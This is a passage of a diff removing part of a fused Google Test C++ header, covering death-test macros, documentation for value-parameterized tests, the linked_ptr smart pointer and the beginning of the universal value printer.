-#  define ASSERT_DEBUG_DEATH(statement, regex) \
-  ASSERT_DEATH(statement, regex)
-
-# endif  // NDEBUG for EXPECT_DEBUG_DEATH
-#endif  // GTEST_HAS_DEATH_TEST
-
-// EXPECT_DEATH_IF_SUPPORTED(statement, regex) and
-// ASSERT_DEATH_IF_SUPPORTED(statement, regex) expand to real death tests if
-// death tests are supported; otherwise they just issue a warning.  This is
-// useful when you are combining death test assertions with normal test
-// assertions in one test.
-#if GTEST_HAS_DEATH_TEST
-# define EXPECT_DEATH_IF_SUPPORTED(statement, regex) \
-    EXPECT_DEATH(statement, regex)
-# define ASSERT_DEATH_IF_SUPPORTED(statement, regex) \
-    ASSERT_DEATH(statement, regex)
-#else
-# define EXPECT_DEATH_IF_SUPPORTED(statement, regex) \
-    GTEST_UNSUPPORTED_DEATH_TEST_(statement, regex, )
-# define ASSERT_DEATH_IF_SUPPORTED(statement, regex) \
-    GTEST_UNSUPPORTED_DEATH_TEST_(statement, regex, return)
-#endif
-
-}  // namespace testing
-
-#endif  // GTEST_INCLUDE_GTEST_GTEST_DEATH_TEST_H_
-// This file was GENERATED by command:
-//     pump.py gtest-param-test.h.pump
-// DO NOT EDIT BY HAND!!!
-
-// Copyright 2008, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Authors: vladl@google.com (Vlad Losev)
-//
-// Macros and functions for implementing parameterized tests
-// in Google C++ Testing Framework (Google Test)
-//
-// This file is generated by a SCRIPT.  DO NOT EDIT BY HAND!
-//
-#ifndef GTEST_INCLUDE_GTEST_GTEST_PARAM_TEST_H_
-#define GTEST_INCLUDE_GTEST_GTEST_PARAM_TEST_H_
-
-
-// Value-parameterized tests allow you to test your code with different
-// parameters without writing multiple copies of the same test.
-//
-// Here is how you use value-parameterized tests:
-
-#if 0
-
-// To write value-parameterized tests, first you should define a fixture
-// class. It is usually derived from testing::TestWithParam<T> (see below for
-// another inheritance scheme that's sometimes useful in more complicated
-// class hierarchies), where the type of your parameter values.
-// TestWithParam<T> is itself derived from testing::Test. T can be any
-// copyable type. If it's a raw pointer, you are responsible for managing the
-// lifespan of the pointed values.
-
-class FooTest : public ::testing::TestWithParam<const char*> {
-  // You can implement all the usual class fixture members here.
-};
-
-// Then, use the TEST_P macro to define as many parameterized tests
-// for this fixture as you want. The _P suffix is for "parameterized"
-// or "pattern", whichever you prefer to think.
-
-TEST_P(FooTest, DoesBlah) {
-  // Inside a test, access the test parameter with the GetParam() method
-  // of the TestWithParam<T> class:
-  EXPECT_TRUE(foo.Blah(GetParam()));
-  ...
-}
-
-TEST_P(FooTest, HasBlahBlah) {
-  ...
-}
-
-// Finally, you can use INSTANTIATE_TEST_CASE_P to instantiate the test
-// case with any set of parameters you want. Google Test defines a number
-// of functions for generating test parameters. They return what we call
-// (surprise!) parameter generators. Here is a  summary of them, which
-// are all in the testing namespace:
-//
-//
-//  Range(begin, end [, step]) - Yields values {begin, begin+step,
-//                               begin+step+step, ...}. The values do not
-//                               include end. step defaults to 1.
-//  Values(v1, v2, ..., vN)    - Yields values {v1, v2, ..., vN}.
-//  ValuesIn(container)        - Yields values from a C-style array, an STL
-//  ValuesIn(begin,end)          container, or an iterator range [begin, end).
-//  Bool()                     - Yields sequence {false, true}.
-//  Combine(g1, g2, ..., gN)   - Yields all combinations (the Cartesian product
-//                               for the math savvy) of the values generated
-//                               by the N generators.
-//
-// For more details, see comments at the definitions of these functions below
-// in this file.
-//
-// The following statement will instantiate tests from the FooTest test case
-// each with parameter values "meeny", "miny", and "moe".
-
-INSTANTIATE_TEST_CASE_P(InstantiationName,
-                        FooTest,
-                        Values("meeny", "miny", "moe"));
-
-// To distinguish different instances of the pattern, (yes, you
-// can instantiate it more then once) the first argument to the
-// INSTANTIATE_TEST_CASE_P macro is a prefix that will be added to the
-// actual test case name. Remember to pick unique prefixes for different
-// instantiations. The tests from the instantiation above will have
-// these names:
-//
-//    * InstantiationName/FooTest.DoesBlah/0 for "meeny"
-//    * InstantiationName/FooTest.DoesBlah/1 for "miny"
-//    * InstantiationName/FooTest.DoesBlah/2 for "moe"
-//    * InstantiationName/FooTest.HasBlahBlah/0 for "meeny"
-//    * InstantiationName/FooTest.HasBlahBlah/1 for "miny"
-//    * InstantiationName/FooTest.HasBlahBlah/2 for "moe"
-//
-// You can use these names in --gtest_filter.
-//
-// This statement will instantiate all tests from FooTest again, each
-// with parameter values "cat" and "dog":
-
-const char* pets[] = {"cat", "dog"};
-INSTANTIATE_TEST_CASE_P(AnotherInstantiationName, FooTest, ValuesIn(pets));
-
-// The tests from the instantiation above will have these names:
-//
-//    * AnotherInstantiationName/FooTest.DoesBlah/0 for "cat"
-//    * AnotherInstantiationName/FooTest.DoesBlah/1 for "dog"
-//    * AnotherInstantiationName/FooTest.HasBlahBlah/0 for "cat"
-//    * AnotherInstantiationName/FooTest.HasBlahBlah/1 for "dog"
-//
-// Please note that INSTANTIATE_TEST_CASE_P will instantiate all tests
-// in the given test case, whether their definitions come before or
-// AFTER the INSTANTIATE_TEST_CASE_P statement.
-//
-// Please also note that generator expressions (including parameters to the
-// generators) are evaluated in InitGoogleTest(), after main() has started.
-// This allows the user on one hand, to adjust generator parameters in order
-// to dynamically determine a set of tests to run and on the other hand,
-// give the user a chance to inspect the generated tests with Google Test
-// reflection API before RUN_ALL_TESTS() is executed.
-//
-// You can see samples/sample7_unittest.cc and samples/sample8_unittest.cc
-// for more examples.
-//
-// In the future, we plan to publish the API for defining new parameter
-// generators. But for now this interface remains part of the internal
-// implementation and is subject to change.
-//
-//
-// A parameterized test fixture must be derived from testing::Test and from
-// testing::WithParamInterface<T>, where T is the type of the parameter
-// values. Inheriting from TestWithParam<T> satisfies that requirement because
-// TestWithParam<T> inherits from both Test and WithParamInterface. In more
-// complicated hierarchies, however, it is occasionally useful to inherit
-// separately from Test and WithParamInterface. For example:
-
-class BaseTest : public ::testing::Test {
-  // You can inherit all the usual members for a non-parameterized test
-  // fixture here.
-};
-
-class DerivedTest : public BaseTest, public ::testing::WithParamInterface<int> {
-  // The usual test fixture members go here too.
-};
-
-TEST_F(BaseTest, HasFoo) {
-  // This is an ordinary non-parameterized test.
-}
-
-TEST_P(DerivedTest, DoesBlah) {
-  // GetParam works just the same here as if you inherit from TestWithParam.
-  EXPECT_TRUE(foo.Blah(GetParam()));
-}
-
-#endif  // 0
-
-
-#if !GTEST_OS_SYMBIAN
-# include <utility>
-#endif
-
-// scripts/fuse_gtest.py depends on gtest's own header being #included
-// *unconditionally*.  Therefore these #includes cannot be moved
-// inside #if GTEST_HAS_PARAM_TEST.
-// Copyright 2008 Google Inc.
-// All Rights Reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: vladl@google.com (Vlad Losev)
-
-// Type and function utilities for implementing parameterized tests.
-
-#ifndef GTEST_INCLUDE_GTEST_INTERNAL_GTEST_PARAM_UTIL_H_
-#define GTEST_INCLUDE_GTEST_INTERNAL_GTEST_PARAM_UTIL_H_
-
-#include <iterator>
-#include <utility>
-#include <vector>
-
-// scripts/fuse_gtest.py depends on gtest's own header being #included
-// *unconditionally*.  Therefore these #includes cannot be moved
-// inside #if GTEST_HAS_PARAM_TEST.
-// Copyright 2003 Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Authors: Dan Egnor (egnor@google.com)
-//
-// A "smart" pointer type with reference tracking.  Every pointer to a
-// particular object is kept on a circular linked list.  When the last pointer
-// to an object is destroyed or reassigned, the object is deleted.
-//
-// Used properly, this deletes the object when the last reference goes away.
-// There are several caveats:
-// - Like all reference counting schemes, cycles lead to leaks.
-// - Each smart pointer is actually two pointers (8 bytes instead of 4).
-// - Every time a pointer is assigned, the entire list of pointers to that
-//   object is traversed.  This class is therefore NOT SUITABLE when there
-//   will often be more than two or three pointers to a particular object.
-// - References are only tracked as long as linked_ptr<> objects are copied.
-//   If a linked_ptr<> is converted to a raw pointer and back, BAD THINGS
-//   will happen (double deletion).
-//
-// A good use of this class is storing object references in STL containers.
-// You can safely put linked_ptr<> in a vector<>.
-// Other uses may not be as good.
-//
-// Note: If you use an incomplete type with linked_ptr<>, the class
-// *containing* linked_ptr<> must have a constructor and destructor (even
-// if they do nothing!).
-//
-// Bill Gibbons suggested we use something like this.
-//
-// Thread Safety:
-//   Unlike other linked_ptr implementations, in this implementation
-//   a linked_ptr object is thread-safe in the sense that:
-//     - it's safe to copy linked_ptr objects concurrently,
-//     - it's safe to copy *from* a linked_ptr and read its underlying
-//       raw pointer (e.g. via get()) concurrently, and
-//     - it's safe to write to two linked_ptrs that point to the same
-//       shared object concurrently.
-// TODO(wan@google.com): rename this to safe_linked_ptr to avoid
-// confusion with normal linked_ptr.
-
-#ifndef GTEST_INCLUDE_GTEST_INTERNAL_GTEST_LINKED_PTR_H_
-#define GTEST_INCLUDE_GTEST_INTERNAL_GTEST_LINKED_PTR_H_
-
-#include <stdlib.h>
-#include <assert.h>
-
-
-namespace testing {
-namespace internal {
-
-// Protects copying of all linked_ptr objects.
-GTEST_API_ GTEST_DECLARE_STATIC_MUTEX_(g_linked_ptr_mutex);
-
-// This is used internally by all instances of linked_ptr<>.  It needs to be
-// a non-template class because different types of linked_ptr<> can refer to
-// the same object (linked_ptr<Superclass>(obj) vs linked_ptr<Subclass>(obj)).
-// So, it needs to be possible for different types of linked_ptr to participate
-// in the same circular linked list, so we need a single class type here.
-//
-// DO NOT USE THIS CLASS DIRECTLY YOURSELF.  Use linked_ptr<T>.
-class linked_ptr_internal {
- public:
-  // Create a new circle that includes only this instance.
-  void join_new() {
-    next_ = this;
-  }
-
-  // Many linked_ptr operations may change p.link_ for some linked_ptr
-  // variable p in the same circle as this object.  Therefore we need
-  // to prevent two such operations from occurring concurrently.
-  //
-  // Note that different types of linked_ptr objects can coexist in a
-  // circle (e.g. linked_ptr<Base>, linked_ptr<Derived1>, and
-  // linked_ptr<Derived2>).  Therefore we must use a single mutex to
-  // protect all linked_ptr objects.  This can create serious
-  // contention in production code, but is acceptable in a testing
-  // framework.
-
-  // Join an existing circle.
-  void join(linked_ptr_internal const* ptr)
-      GTEST_LOCK_EXCLUDED_(g_linked_ptr_mutex) {
-    MutexLock lock(&g_linked_ptr_mutex);
-
-    linked_ptr_internal const* p = ptr;
-    while (p->next_ != ptr) {
-      assert(p->next_ != this &&
-             "Trying to join() a linked ring we are already in. "
-             "Is GMock thread safety enabled?");
-      p = p->next_;
-    }
-    p->next_ = this;
-    next_ = ptr;
-  }
-
-  // Leave whatever circle we're part of.  Returns true if we were the
-  // last member of the circle.  Once this is done, you can join() another.
-  bool depart()
-      GTEST_LOCK_EXCLUDED_(g_linked_ptr_mutex) {
-    MutexLock lock(&g_linked_ptr_mutex);
-
-    if (next_ == this) return true;
-    linked_ptr_internal const* p = next_;
-    while (p->next_ != this) {
-      assert(p->next_ != next_ &&
-             "Trying to depart() a linked ring we are not in. "
-             "Is GMock thread safety enabled?");
-      p = p->next_;
-    }
-    p->next_ = next_;
-    return false;
-  }
-
- private:
-  mutable linked_ptr_internal const* next_;
-};
-
-template <typename T>
-class linked_ptr {
- public:
-  typedef T element_type;
-
-  // Take over ownership of a raw pointer.  This should happen as soon as
-  // possible after the object is created.
-  explicit linked_ptr(T* ptr = NULL) { capture(ptr); }
-  ~linked_ptr() { depart(); }
-
-  // Copy an existing linked_ptr<>, adding ourselves to the list of references.
-  template <typename U> linked_ptr(linked_ptr<U> const& ptr) { copy(&ptr); }
-  linked_ptr(linked_ptr const& ptr) {  // NOLINT
-    assert(&ptr != this);
-    copy(&ptr);
-  }
-
-  // Assignment releases the old value and acquires the new.
-  template <typename U> linked_ptr& operator=(linked_ptr<U> const& ptr) {
-    depart();
-    copy(&ptr);
-    return *this;
-  }
-
-  linked_ptr& operator=(linked_ptr const& ptr) {
-    if (&ptr != this) {
-      depart();
-      copy(&ptr);
-    }
-    return *this;
-  }
-
-  // Smart pointer members.
-  void reset(T* ptr = NULL) {
-    depart();
-    capture(ptr);
-  }
-  T* get() const { return value_; }
-  T* operator->() const { return value_; }
-  T& operator*() const { return *value_; }
-
-  bool operator==(T* p) const { return value_ == p; }
-  bool operator!=(T* p) const { return value_ != p; }
-  template <typename U>
-  bool operator==(linked_ptr<U> const& ptr) const {
-    return value_ == ptr.get();
-  }
-  template <typename U>
-  bool operator!=(linked_ptr<U> const& ptr) const {
-    return value_ != ptr.get();
-  }
-
- private:
-  template <typename U>
-  friend class linked_ptr;
-
-  T* value_;
-  linked_ptr_internal link_;
-
-  void depart() {
-    if (link_.depart()) delete value_;
-  }
-
-  void capture(T* ptr) {
-    value_ = ptr;
-    link_.join_new();
-  }
-
-  template <typename U> void copy(linked_ptr<U> const* ptr) {
-    value_ = ptr->get();
-    if (value_)
-      link_.join(&ptr->link_);
-    else
-      link_.join_new();
-  }
-};
-
-template<typename T> inline
-bool operator==(T* ptr, const linked_ptr<T>& x) {
-  return ptr == x.get();
-}
-
-template<typename T> inline
-bool operator!=(T* ptr, const linked_ptr<T>& x) {
-  return ptr != x.get();
-}
-
-// A function to convert T* into linked_ptr<T>
-// Doing e.g. make_linked_ptr(new FooBarBaz<type>(arg)) is a shorter notation
-// for linked_ptr<FooBarBaz<type> >(new FooBarBaz<type>(arg))
-template <typename T>
-linked_ptr<T> make_linked_ptr(T* ptr) {
-  return linked_ptr<T>(ptr);
-}
-
-}  // namespace internal
-}  // namespace testing
-
-#endif  // GTEST_INCLUDE_GTEST_INTERNAL_GTEST_LINKED_PTR_H_
-// Copyright 2007, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: wan@google.com (Zhanyong Wan)
-
-// Google Test - The Google C++ Testing Framework
-//
-// This file implements a universal value printer that can print a
-// value of any type T:
-//
-//   void ::testing::internal::UniversalPrinter<T>::Print(value, ostream_ptr);
-//
-// A user can teach this function how to print a class type T by
-// defining either operator<<() or PrintTo() in the namespace that
-// defines T.  More specifically, the FIRST defined function in the
-// following list will be used (assuming T is defined in namespace
-// foo):
-//
-//   1. foo::PrintTo(const T&, ostream*)
-//   2. operator<<(ostream&, const T&) defined in either foo or the
-//      global namespace.
-//
-// If none of the above is defined, it will print the debug string of
-// the value if it is a protocol buffer, or print the raw bytes in the
-// value otherwise.
-//
-// To aid debugging: when T is a reference type, the address of the
-// value is also printed; when T is a (const) char pointer, both the
-// pointer value and the NUL-terminated string it points to are
-// printed.
-//
-// We also provide some convenient wrappers:
-//
-//   // Prints a value to a string.  For a (const or not) char
-//   // pointer, the NUL-terminated string (but not the pointer) is
-//   // printed.
-//   std::string ::testing::PrintToString(const T& value);
-//
-//   // Prints a value tersely: for a reference type, the referenced
-//   // value (but not the address) is printed; for a (const or not) char
-//   // pointer, the NUL-terminated string (but not the pointer) is
-//   // printed.
-//   void ::testing::internal::UniversalTersePrint(const T& value, ostream*);
-//
-//   // Prints value using the type inferred by the compiler.  The difference
-//   // from UniversalTersePrint() is that this function prints both the
-//   // pointer and the NUL-terminated string for a (const or not) char pointer.
-//   void ::testing::internal::UniversalPrint(const T& value, ostream*);
-//
-//   // Prints the fields of a tuple tersely to a string vector, one
-//   // element for each field. Tuple support must be enabled in
-//   // gtest-port.h.
-//   std::vector<string> UniversalTersePrintTupleFieldsToStrings(
-//       const Tuple& value);
-//
-// Known limitation:
-//
-// The print primitives print the elements of an STL-style container
-// using the compiler-inferred type of *iter where iter is a
-// const_iterator of the container.  When const_iterator is an input
-// iterator but not a forward iterator, this inferred type may not
-// match value_type, and the print output may be incorrect.  In
-// practice, this is rarely a problem as for most containers
-// const_iterator is a forward iterator.  We'll fix this if there's an
-// actual need for it.  Note that this fix cannot rely on value_type
-// being defined as many user-defined container types don't have
-// value_type.
-
-#ifndef GTEST_INCLUDE_GTEST_GTEST_PRINTERS_H_
-#define GTEST_INCLUDE_GTEST_GTEST_PRINTERS_H_
-
-#include <ostream>  // NOLINT
-#include <sstream>
-#include <string>
-#include <utility>
-#include <vector>
-
-#if GTEST_HAS_STD_TUPLE_
-# include <tuple>
-#endif
-
-namespace testing {
-
-// Definitions in the 'internal' and 'internal2' name spaces are
-// subject to change without notice.  DO NOT USE THEM IN USER CODE!
-namespace internal2 {
-
-// Prints the given number of bytes in the given object to the given
-// ostream.
-GTEST_API_ void PrintBytesInObjectTo(const unsigned char* obj_bytes,
-                                     size_t count,
-                                     ::std::ostream* os);
-
-// For selecting which printer to use when a given type has neither <<
-// nor PrintTo().
-enum TypeKind {
-  kProtobuf,              // a protobuf type
-  kConvertibleToInteger,  // a type implicitly convertible to BiggestInt
-                          // (e.g. a named or unnamed enum type)
-  kOtherType              // anything else
-};
-
-// TypeWithoutFormatter<T, kTypeKind>::PrintValue(value, os) is called
-// by the universal printer to print a value of type T when neither
-// operator<< nor PrintTo() is defined for T, where kTypeKind is the
-// "kind" of T as defined by enum TypeKind.
-template <typename T, TypeKind kTypeKind>
-class TypeWithoutFormatter {
- public:
-  // This default version is called when kTypeKind is kOtherType.
-  static void PrintValue(const T& value, ::std::ostream* os) {
-    PrintBytesInObjectTo(reinterpret_cast<const unsigned char*>(&value),
-                         sizeof(value), os);
-  }
-};
-
-// We print a protobuf using its ShortDebugString() when the string
-// doesn't exceed this many characters; otherwise we print it using
-// DebugString() for better readability.
-const size_t kProtobufOneLinerMaxLength = 50;
-
-template <typename T>
-class TypeWithoutFormatter<T, kProtobuf> {
- public:
-  static void PrintValue(const T& value, ::std::ostream* os) {
-    const ::testing::internal::string short_str = value.ShortDebugString();
-    const ::testing::internal::string pretty_str =
-        short_str.length() <= kProtobufOneLinerMaxLength ?
-        short_str : ("\n" + value.DebugString());
-    *os << ("<" + pretty_str + ">");
-  }
-};
-
-template <typename T>
-class TypeWithoutFormatter<T, kConvertibleToInteger> {
- public:
-  // Since T has no << operator or PrintTo() but can be implicitly
-  // converted to BiggestInt, we print it as a BiggestInt.
-  //
-  // Most likely T is an enum type (either named or unnamed), in which
-  // case printing it as an integer is the desired behavior.  In case
-  // T is not an enum, printing it as an integer is the best we can do
-  // given that it has no user-defined printer.
-  static void PrintValue(const T& value, ::std::ostream* os) {
-    const internal::BiggestInt kBigInt = value;
-    *os << kBigInt;
-  }
-};
-
-// Prints the given value to the given ostream.  If the value is a
-// protocol message, its debug string is printed; if it's an enum or
-// of a type implicitly convertible to BiggestInt, it's printed as an
-// integer; otherwise the bytes in the value are printed.  This is
-// what UniversalPrinter<T>::Print() does when it knows nothing about
-// type T and T has neither << operator nor PrintTo().
-//
-// A user can override this behavior for a class type Foo by defining
-// a << operator in the namespace where Foo is defined.
-//
-// We put this operator in namespace 'internal2' instead of 'internal'
-// to simplify the implementation, as much code in 'internal' needs to
-// use << in STL, which would conflict with our own << were it defined
-// in 'internal'.
-//
-// Note that this operator<< takes a generic std::basic_ostream<Char,
-// CharTraits> type instead of the more restricted std::ostream.  If
-// we define it to take an std::ostream instead, we'll get an
-// "ambiguous overloads" compiler error when trying to print a type
-// Foo that supports streaming to std::basic_ostream<Char,
-// CharTraits>, as the compiler cannot tell whether
-// operator<<(std::ostream&, const T&) or
-// operator<<(std::basic_stream<Char, CharTraits>, const Foo&) is more
-// specific.
-template <typename Char, typename CharTraits, typename T>
-::std::basic_ostream<Char, CharTraits>& operator<<(
-    ::std::basic_ostream<Char, CharTraits>& os, const T& x) {
-  TypeWithoutFormatter<T,
-      (internal::IsAProtocolMessage<T>::value ? kProtobuf :
-       internal::ImplicitlyConvertible<const T&, internal::BiggestInt>::value ?
-       kConvertibleToInteger : kOtherType)>::PrintValue(x, &os);
-  return os;
-}
-
-}  // namespace internal2
-}  // namespace testing
-
-// This namespace MUST NOT BE NESTED IN ::testing, or the name look-up
-// magic needed for implementing UniversalPrinter won't work.
-namespace testing_internal {
-
-// Used to print a value that is not an STL-style container when the
-// user doesn't define PrintTo() for it.
-template <typename T>
-void DefaultPrintNonContainerTo(const T& value, ::std::ostream* os) {
-  // With the following statement, during unqualified name lookup,
-  // testing::internal2::operator<< appears as if it was declared in
-  // the nearest enclosing namespace that contains both
-  // ::testing_internal and ::testing::internal2, i.e. the global
-  // namespace.  For more details, refer to the C++ Standard section
-  // 7.3.4-1 [namespace.udir].  This allows us to fall back onto
-  // testing::internal2::operator<< in case T doesn't come with a <<
-  // operator.
-  //
-  // We cannot write 'using ::testing::internal2::operator<<;', which
-  // gcc 3.3 fails to compile due to a compiler bug.
-  using namespace ::testing::internal2;  // NOLINT
-
-  // Assuming T is defined in namespace foo, in the next statement,
-  // the compiler will consider all of:
-  //
-  //   1. foo::operator<< (thanks to Koenig look-up),
-  //   2. ::operator<< (as the current namespace is enclosed in ::),
-  //   3. testing::internal2::operator<< (thanks to the using statement above).
-  //
-  // The operator<< whose type matches T best will be picked.
-  //
-  // We deliberately allow #2 to be a candidate, as sometimes it's
-  // impossible to define #1 (e.g. when foo is ::std, defining
-  // anything in it is undefined behavior unless you are a compiler
-  // vendor.).
-  *os << value;
-}
-
-}  // namespace testing_internal
-
-namespace testing {
-namespace internal {
-
-// UniversalPrinter<T>::Print(value, ostream_ptr) prints the given
-// value to the given ostream.  The caller must ensure that
-// 'ostream_ptr' is not NULL, or the behavior is undefined.
-//
-// We define UniversalPrinter as a class template (as opposed to a
-// function template), as we need to partially specialize it for
-// reference types, which cannot be done with function templates.
-template <typename T>
-class UniversalPrinter;
-
-template <typename T>
-void UniversalPrint(const T& value, ::std::ostream* os);
-
-// Used to print an STL-style container when the user doesn't define
-// a PrintTo() for it.
-template <typename C>
-void DefaultPrintTo(IsContainer /* dummy */,
-                    false_type /* is not a pointer */,
-                    const C& container, ::std::ostream* os) {
-  const size_t kMaxCount = 32;  // The maximum number of elements to print.
-  *os << '{';
-  size_t count = 0;
-  for (typename C::const_iterator it = container.begin();
-       it != container.end(); ++it, ++count) {
-    if (count > 0) {
-      *os << ',';
-      if (count == kMaxCount) {  // Enough has been printed.
-        *os << " ...";
-        break;
-      }
-    }
-    *os << ' ';
-    // We cannot call PrintTo(*it, os) here as PrintTo() doesn't
-    // handle *it being a native array.
-    internal::UniversalPrint(*it, os);
-  }
-
-  if (count > 0) {
-    *os << ' ';
-  }
-  *os << '}';
-}
-
-// Used to print a pointer that is neither a char pointer nor a member
-// pointer, when the user doesn't define PrintTo() for it.  (A member
-// variable pointer or member function pointer doesn't really point to
-// a location in the address space.  Their representation is
-// implementation-defined.  Therefore they will be printed as raw
-// bytes.)
-template <typename T>
-void DefaultPrintTo(IsNotContainer /* dummy */,
-                    true_type /* is a pointer */,
-                    T* p, ::std::ostream* os) {
-  if (p == NULL) {
-    *os << "NULL";
-  } else {
-    // C++ doesn't allow casting from a function pointer to any object
-    // pointer.
-    //
-    // IsTrue() silences warnings: "Condition is always true",
-    // "unreachable code".
-    if (IsTrue(ImplicitlyConvertible<T*, const void*>::value)) {
-      // T is not a function type.  We just call << to print p,
-      // relying on ADL to pick up user-defined << for their pointer
-      // types, if any.
-      *os << p;
-    } else {
-      // T is a function type, so '*os << p' doesn't do what we want
-      // (it just prints p as bool).  We want to print p as a const
-      // void*.  However, we cannot cast it to const void* directly,
-      // even using reinterpret_cast, as earlier versions of gcc
-      // (e.g. 3.4.5) cannot compile the cast when p is a function
-      // pointer.  Casting to UInt64 first solves the problem.
-      *os << reinterpret_cast<const void*>(
-          reinterpret_cast<internal::UInt64>(p));
-    }
-  }
-}
-
-// Used to print a non-container, non-pointer value when the user
-// doesn't define PrintTo() for it.
-template <typename T>
-void DefaultPrintTo(IsNotContainer /* dummy */,
-                    false_type /* is not a pointer */,
-                    const T& value, ::std::ostream* os) {
-  ::testing_internal::DefaultPrintNonContainerTo(value, os);
-}
-
-// Prints the given value using the << operator if it has one;
-// otherwise prints the bytes in it.  This is what
